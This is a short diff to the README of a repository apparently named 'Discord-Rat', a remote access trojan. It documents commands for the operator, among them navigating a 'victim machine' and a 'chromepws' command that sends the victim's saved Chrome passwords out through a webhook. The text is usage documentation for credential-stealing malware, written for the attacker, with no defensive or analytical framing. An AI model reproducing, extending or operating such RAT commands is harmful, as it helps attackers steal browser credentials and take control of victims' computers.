TCDev69/Discord-Rat/README.md

 cd - change directory

-cd C:/users/USERNAME (enter the victim machine username instead of USERNAME, can use cmd "echo %username%" to get it)
+cd C:/users/USERNAME (enter the victim machine username instead of USERNAME, can use 'cmd "echo %username%"' to get it)

-chromepws - send with webhook login data and local state
+chromepws - sends with webhook a text file with victim machine chrome password

 no parameters